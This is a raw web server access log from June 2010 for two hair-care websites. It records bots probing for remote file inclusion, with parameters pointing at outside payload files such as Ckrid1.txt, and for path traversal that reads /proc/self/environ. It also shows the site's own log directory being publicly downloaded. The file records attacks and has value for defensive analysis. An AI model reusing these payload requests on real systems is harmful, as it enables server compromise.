67.205.67.73 - - [27/Jun/2010:17:03:14 -0700] "GET /logs//nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [27/Jun/2010:17:03:14 -0700] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
91.198.130.7 - - [27/Jun/2010:17:06:16 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:17:06:16 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:17:06:16 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:17:06:56 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
91.198.130.7 - - [27/Jun/2010:17:06:56 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
91.198.130.7 - - [27/Jun/2010:17:07:13 -0700] "GET /logs/access_100614.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:12:08 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
81.177.6.211 - - [27/Jun/2010:17:12:13 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 2798780 "-" "-" "www.freehairsecrets.com"
81.177.6.211 - - [27/Jun/2010:17:12:14 -0700] "GET /logs/access_100510.log HTTP/1.0" 200 786432 "-" "-" "www.freehairsecrets.com"
41.216.52.20 - - [27/Jun/2010:17:12:14 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:15:23 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 720896 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
74.118.192.164 - - [27/Jun/2010:17:18:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "www.freehairsecrets.com"
74.118.192.164 - - [27/Jun/2010:17:18:03 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)" "www.freehairsecrets.com"
41.216.52.20 - - [27/Jun/2010:17:29:19 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:33:13 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 720896 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
66.246.72.50 - - [27/Jun/2010:17:34:26 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.246.72.50 - - [27/Jun/2010:17:34:26 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.246.72.50 - - [27/Jun/2010:17:34:26 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
41.216.52.20 - - [27/Jun/2010:17:36:42 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
66.249.65.173 - - [27/Jun/2010:17:39:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "freehairsecrets.com"
41.216.52.20 - - [27/Jun/2010:17:41:08 -0700] "GET /logs/access_100503.log HTTP/1.1" 200 2519989 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:44:19 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:17:47:58 -0700] "GET /index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:17:48:01 -0700] "GET /index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:49:43 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 1638400 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
74.118.192.164 - - [27/Jun/2010:17:50:20 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
74.118.192.164 - - [27/Jun/2010:17:50:20 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)" "growlonghairfast.com"
41.216.52.20 - - [27/Jun/2010:17:51:03 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 786432 "http://search.yahoo.com/search;_ylt=A0geupc_vydM__gAw6pXNyoA?p=%2B20%2Fhotmail.com%2Fyahoo.com%2Ftxt%2F2010&fr2=sb-top&fr=yfp-t-701&n=100&vm=p&vf=txt&vs=&vd=y&sao=0" "Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1" "growlonghairfast.com"
67.195.37.176 - - [27/Jun/2010:17:53:05 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [27/Jun/2010:17:53:07 -0700] "GET /logs/access_100118.log HTTP/1.0" 200 1274743 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:10 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:10 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:10 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:12 -0700] "GET /logs/access_100621.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:18 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:18 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:34 -0700] "GET /logs/access_100621.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:17:54:40 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:01:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:04:55 -0700] "GET /logs/access_100208.log//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:04:56 -0700] "GET /index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:04:56 -0700] "GET /logs//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:05:01 -0700] "GET /logs/access_100208.log//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:05:02 -0700] "GET /index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:05:02 -0700] "GET /logs//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
91.212.226.210 - - [27/Jun/2010:18:05:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
91.212.226.210 - - [27/Jun/2010:18:05:26 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:18:13:49 -0700] "GET /logs/access_100614.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:18:13:49 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:18:13:49 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
91.212.226.210 - - [27/Jun/2010:18:15:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "freehairsecrets.com"
91.212.226.210 - - [27/Jun/2010:18:15:41 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:17:57 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
81.19.79.209 - - [27/Jun/2010:18:22:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:32 -0700] "GET /logs/access_100621.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:32 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:32 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:37 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:43 -0700] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:44 -0700] "GET /logs/access_100621.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:44 -0700] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [27/Jun/2010:18:23:53 -0700] "GET /logs/access.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.150.221.224 - - [27/Jun/2010:18:33:03 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "growlonghairfast.com"
91.150.221.224 - - [27/Jun/2010:18:33:05 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)" "growlonghairfast.com"
124.115.4.201 - - [27/Jun/2010:18:35:03 -0700] "GET / HTTP/1.1" 200 926 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
208.115.111.248 - - [27/Jun/2010:18:35:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10226 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14487 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1696 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17323 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6786 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:34 -0700] "GET /logs/?D=D HTTP/1.1" 200 6229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:39 -0700] "GET /logs/?M=D HTTP/1.1" 200 6229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:35:54 -0700] "GET /logs/?N=A HTTP/1.1" 200 6229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:36:45 -0700] "GET /logs/?N=D HTTP/1.1" 200 6229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [27/Jun/2010:18:36:49 -0700] "GET /logs/?S=D HTTP/1.1" 200 6229 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
91.212.226.240 - - [27/Jun/2010:18:42:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
91.212.226.240 - - [27/Jun/2010:18:42:05 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:44:20 -0700] "GET /logs/access_100322.log//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:18:44:20 -0700] "GET /logs/access_100322.log//index.php?option=com_jce&view=jce&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:18:50:01 -0700] "GET /logs/access_091214.log HTTP/1.1" 200 793223 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:50:05 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:50:14 -0700] "GET /logs/access_091228.log HTTP/1.1" 200 636872 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
91.212.226.240 - - [27/Jun/2010:18:51:48 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/0.6 Beta (Windows)" "freehairsecrets.com"
91.212.226.240 - - [27/Jun/2010:18:51:48 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/0.6 Beta (Windows)" "freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:52:33 -0700] "GET /logs/access_100104.log HTTP/1.1" 200 553567 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
66.249.65.177 - - [27/Jun/2010:18:52:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
58.13.32.51 - - [27/Jun/2010:18:54:45 -0700] "GET /logs/access_100301.log HTTP/1.0" 200 2120251 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:54:54 -0700] "GET /logs/access_100111.log HTTP/1.1" 200 1004971 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:18:56:22 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:58:52 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:58:52 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:58:52 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:59:32 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:59:32 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:59:32 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:18:59:57 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:18:59:57 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:18:59:57 -0700] "GET /logs/access_100621.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:19:00:13 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
87.118.96.160 - - [27/Jun/2010:19:01:23 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:02:20 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:02:40 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:02:40 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:02:41 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
202.29.86.7 - - [27/Jun/2010:19:04:06 -0700] "GET /setup.php?dir=http://www.ozeire.net//Ckrid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:19:04:06 -0700] "GET /logs/access_100104.log/setup.php?dir=http://www.ozeire.net//Ckrid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
202.29.86.7 - - [27/Jun/2010:19:04:06 -0700] "GET /logs/setup.php?dir=http://www.ozeire.net//Ckrid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:05:56 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:05:56 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
